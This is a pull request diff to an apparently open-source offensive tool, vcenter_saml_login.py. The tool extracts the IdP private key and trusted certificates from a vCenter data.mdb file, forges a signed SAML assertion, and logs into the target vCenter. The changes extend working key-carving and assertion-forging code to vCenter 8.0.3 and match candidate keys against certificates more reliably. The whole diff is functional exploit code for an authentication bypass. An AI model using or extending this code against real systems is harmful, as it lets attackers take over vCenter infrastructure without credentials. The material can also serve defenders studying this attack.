### PR TITLE
Add support for recent vCenter versions and improve certificate parsing

### DIFF
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,5 +1,5 @@
 python-dateutil
-signxml
+xmlsec
 requests
 lxml
 python-ldap

--- a/vcenter_saml_login.py
+++ b/vcenter_saml_login.py
@@ -22,10 +22,12 @@ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 session = requests.Session()
 
-idp_cert_flag = b'\x30\x82'
+idp_key_flag = b'\x30\x82'
 trusted_cert1_flag1 = b'\x63\x6e\x3d\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x43\x68\x61\x69\x6e\x2d\x31\x2c\x63\x6e\x3d\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x65\x43\x68\x61\x69\x6e\x73\x2c' # cn=TrustedCertChain-1,cn=TrustedCertificateChains,
-trusted_cert1_flag2 = idp_cert_flag
-trusted_cert2_flag = b'\x01\x00\x12\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x43\x68\x61\x69\x6e\x2d\x31' # \x01\x00\x12TrustedCertChain-1
+trusted_cert1_flag2 = b'\x63\x6e\x3d\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x43\x68\x61\x69\x6e\x2d\x32\x2c\x63\x6e\x3d\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x65\x43\x68\x61\x69\x6e\x73\x2c' # cn=TrustedCertChain-2,cn=TrustedCertificateChains,
+trusted_cert1_flag3 = idp_key_flag
+trusted_cert2_flag1 = b'\x01\x00\x12\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x43\x68\x61\x69\x6e\x2d\x31' # \x01\x00\x12TrustedCertChain-1
+trusted_cert2_flag2 = b'\x01\x00\x12\x54\x72\x75\x73\x74\x65\x64\x43\x65\x72\x74\x43\x68\x61\x69\x6e\x2d\x32' # \x01\x00\x12TrustedCertChain-2
 not_it_list = [b'Engineering', b'California', b'object']
 
 SAML_TEMPLATE = \
@@ -87,19 +89,19 @@ r"""<?xml version="1.0" encoding="UTF-8"?>
 
 def writepem(bytes, verbose):
     data = base64.encodebytes(bytes).decode("utf-8").rstrip()
-    key = "-----BEGIN CERTIFICATE-----\n" + data + "\n-----END CERTIFICATE-----"
+    cert = "-----BEGIN CERTIFICATE-----\n" + data + "\n-----END CERTIFICATE-----"
     if verbose:
         print('[*] Extracted Trusted certificate:')
-        print(key + '\n')
+        print(cert + '\n')
 
-    return key
+    return cert
 
     
 def writekey(bytes, verbose):
     data = base64.encodebytes(bytes).decode("utf-8").rstrip()
     key = "-----BEGIN PRIVATE KEY-----\n" + data + "\n-----END PRIVATE KEY-----"
     if verbose:
-        print('[*] Extracted IdP certificate:')
+        print('[*] Extracted a candidate for the IdP key:')
         print(key + '\n')
     
     return key
@@ -131,26 +133,71 @@ def check_cert_valid(cert_bytes, verbose=False):
         return False
 
 
-def get_idp_cert(stream, verbose=False):
-    tup = stream.findall(idp_cert_flag, bytealigned=True)
+def check_cert_root_ca(cert_bytes, verbose=False):
+    cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
+    for ext in cert.get_extensions():
+        short_name = ext.get_short_name()
+        if short_name == b'basicConstraints':
+            if 'CA:TRUE' in str(ext):
+                return True
+            break
+
+    if verbose:
+        print("[!] Certificate is not a root certificate")
+    return False
+
+
+def check_private_key_matches_cert(private_key_str, cert_str):
+    try:
+        private_key = crypto.load_privatekey(crypto.FILETYPE_PEM, private_key_str)
+        cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_str)
+
+        pkey_pub = crypto.dump_publickey(crypto.FILETYPE_PEM, private_key)
+        cert_pub = crypto.dump_publickey(crypto.FILETYPE_PEM, cert.get_pubkey())
+
+        return pkey_pub == cert_pub
+    except crypto.Error:
+        return False
+
+
+def get_idp_key_candidates(stream, verbose=False):
+    tup = stream.findall(idp_key_flag, bytealigned=True)
     matches = list(tup)
+    keys = []
     for match in matches:
         stream.pos = match - 16
         size_hex = stream.read('bytes:2')
         size = int(size_hex.hex(), 16)
-        cert_bytes = stream.read(f'bytes:{size}')
-        if any(not_it in cert_bytes for not_it in not_it_list):
+        try:
+            key_bytes = stream.read(f'bytes:{size}')
+        except bitstring.ReadError:
+            continue
+        if any(not_it in key_bytes for not_it in not_it_list):
             continue
 
-        if not check_key_valid(cert_bytes):
+        if not check_key_valid(key_bytes):
             continue
-        key = writekey(cert_bytes, verbose)
- 
-        print('[*] Successfully extracted the IdP certificate')        
-        return key
-    else:
-        print(f'[-] Failed to find the IdP certificate')
-        sys.exit()
+
+        print('[*] Found a candidate for the IdP key') 
+        key = writekey(key_bytes, verbose)
+        keys.append(key)
+    if keys:
+        return keys
+
+    print(f'[-] Failed to find the IdP key')
+    sys.exit()
+
+
+def get_idp_key(idp_key_candidates, trusted_cert1, verbose=False):
+    for candidate in idp_key_candidates:
+        if check_private_key_matches_cert(candidate, trusted_cert1):
+            print('[*] Successfully extracted the IdP key')
+            if verbose:
+                print(candidate)
+            return candidate
+
+    print('[-] Failed to extract the IdP key')
+    sys.exit()
 
 
 def get_domain_from_cn(cn):
@@ -187,41 +234,45 @@ def get_trusted_cert1_pem(stream, verbose=False):
 
 def get_trusted_cert1(stream, domain_lookup=True, verbose=False):
     if domain_lookup:
-        tup = stream.findall(trusted_cert1_flag1)
-        matches = list(tup)
-        if matches:
-            for match in matches:
-                stream.pos = match
-                if verbose:
-                    print(f'[!] Looking for cert 1 at position: {match}')
+        for trusted_cert1_flag in [trusted_cert1_flag1, trusted_cert1_flag2]:
+            tup = stream.findall(trusted_cert1_flag)
+            matches = list(tup)
+            if matches:
+                for match in matches:
+                    stream.pos = match
+                    if verbose:
+                        print(f'[!] Looking for cert 1 at position: {match}')
 
-                cn_end = stream.readto('0x000013', bytealigned=True)
-                cn_end_pos = stream.pos
-                if verbose:
-                    print(f'[!] CN end position: {cn_end_pos}')
+                    cn_end = stream.readto('0x000013', bytealigned=True)
+                    cn_end_pos = stream.pos
+                    if verbose:
+                        print(f'[!] CN end position: {cn_end_pos}')
 
-                stream.pos = match
-                cn_len = int((cn_end_pos - match - 8) / 8)
-                cn = stream.read(f'bytes:{cn_len}').decode()
-                domain = get_domain_from_cn(cn)
-                if domain:
-                    print(f'[*] CN: {cn}')
-                    print(f'[*] Domain: {domain}')
-                else:
-                    print(f'[!] Failed parsing domain from CN')
-                    sys.exit()
+                    stream.pos = match
+                    cn_len = int((cn_end_pos - match - 8) / 8)
+                    try:
+                        cn = stream.read(f'bytes:{cn_len}').decode()
+                    except UnicodeDecodeError:
+                        continue
+                    domain = get_domain_from_cn(cn)
+                    if domain:
+                        print(f'[*] CN: {cn}')
+                        print(f'[*] Domain: {domain}')
+                    else:
+                        print(f'[!] Failed parsing domain from CN')
+                        sys.exit()
 
-                stream.readto(f'0x0002', bytealigned=True)
-                cert1 = get_trusted_cert1_pem(stream)
-                if cert1 is not None:
-                    return cert1, domain
+                    stream.readto(f'0x0002', bytealigned=True)
+                    cert1 = get_trusted_cert1_pem(stream, verbose)
+                    if cert1 is not None:
+                        return cert1, domain
     else:
-        tup = stream.findall(trusted_cert1_flag2)
+        tup = stream.findall(trusted_cert1_flag3)
         matches = list(tup)
         if matches:
             for match in matches:
                 stream.pos = match - 16
-                cert1 = get_trusted_cert1_pem(stream)
+                cert1 = get_trusted_cert1_pem(stream, verbose)
                 if cert1 is not None:
                     return cert1
     print(f'[-] Failed to find the trusted certificate 1')
@@ -229,34 +280,32 @@ def get_trusted_cert1(stream, domain_lookup=True, verbose=False):
 
 def get_trusted_cert2(stream, verbose=False):
     # Get TrustedCertificate1 pem2
-    tup = stream.findall(trusted_cert2_flag)
-    matches = list(tup)
-    for match in matches:
-        stream.pos = match - 10240
+    for trusted_cert2_flag in [trusted_cert2_flag1, trusted_cert2_flag2]:
+        tup = stream.findall(trusted_cert2_flag)
+        matches = list(tup)
+        for match in matches:
+            stream.pos = match - 10240
 
-        try:
-            start = stream.readto('0x308204', bytealigned=True)
-        except:
-            print('Failed finding cert 2 with flag 1, looking for flag 2...')
             try:
-                start = stream.readto('0x308203', bytealigned=True)
+                start = stream.readto('0x3082', bytealigned=True)
             except:
                 print('Failed finding cert 2')
                 sys.exit()
 
-        stream.pos = stream.pos - 40
-        cert2_size_hex = stream.read('bytes:2')
-        cert2_size = int(cert2_size_hex.hex(), 16)
-        cert2_bytes = stream.read(f'bytes:{cert2_size}')
-        if verbose:
-            print(f'Cert 2 Size: {cert2_size}')
+            stream.pos = stream.pos - 32
+            cert2_size_hex = stream.read('bytes:2')
+            cert2_size = int(cert2_size_hex.hex(), 16)
+            cert2_bytes = stream.read(f'bytes:{cert2_size}')
+            if verbose:
+                print(f'Cert 2 Size: {cert2_size}')
 
-        if not check_cert_valid(cert2_bytes):
-            continue
-        cert2 = writepem(cert2_bytes, verbose)
+            if not check_cert_valid(cert2_bytes, verbose) and not check_cert_root_ca(writepem(cert2_bytes), verbose):
+                continue
 
-        print('[*] Successfully extracted trusted certificate 2')
-        return cert2
+            cert2 = writepem(cert2_bytes, verbose)
+
+            print('[*] Successfully extracted trusted certificate 2')
+            return cert2
 
     print(f'[-] Failed to find the trusted cert 2')
     sys.exit()
@@ -400,23 +449,27 @@ if __name__ == '__main__':
     parser.add_argument('-p', '--path', help='The path to the data.mdb file', required=True)
     parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
     parser.add_argument('-d', '--domain', help='vCenter SSO domain')
-    parser.add_argument('-v', '--verbose', action='store_true', help='Print the extracted certificates')
+    parser.add_argument('-v', '--verbose', action='store_true', help='Print the extracted certificates and private key')
     args = parser.parse_args()
 
-    # Extract certificates
+    # Extract certificates and private key
     in_stream = open(args.path, 'rb')
     bin_stream = bitstring.ConstBitStream(in_stream)
-    idp_cert = get_idp_cert(bin_stream, args.verbose)
+    idp_key_candidates = get_idp_key_candidates(bin_stream, args.verbose)
+
     if args.domain is None:
         trusted_cert_1, domain = get_trusted_cert1(bin_stream, domain_lookup=True, verbose=args.verbose)
     else:
         trusted_cert_1 = get_trusted_cert1(bin_stream, domain_lookup=False, verbose=args.verbose)
         domain = args.domain
+
+    idp_key = get_idp_key(idp_key_candidates, trusted_cert_1, args.verbose)
     trusted_cert_2 = get_trusted_cert2(bin_stream, args.verbose)
 
     # Generate SAML request
     hostname = get_hostname(args.target)
     req, relaystate = saml_request(args.target)
     t = fill_template(hostname, args.target, domain,req)
-    s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_cert)
+    s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_key)
     c = login(args.target, s, relaystate)
+


### PR DESCRIPTION
This PR:

- Adds support for recent vCenter versions (tested on 8.0.3.00400).
- Tries to improve certificate parsing by getting the correct bytes indicating the certificate size.

Part of this PR is based on previous PRs (#13 from @Xerzzul and #16 from @bms-it-raphaeljohn).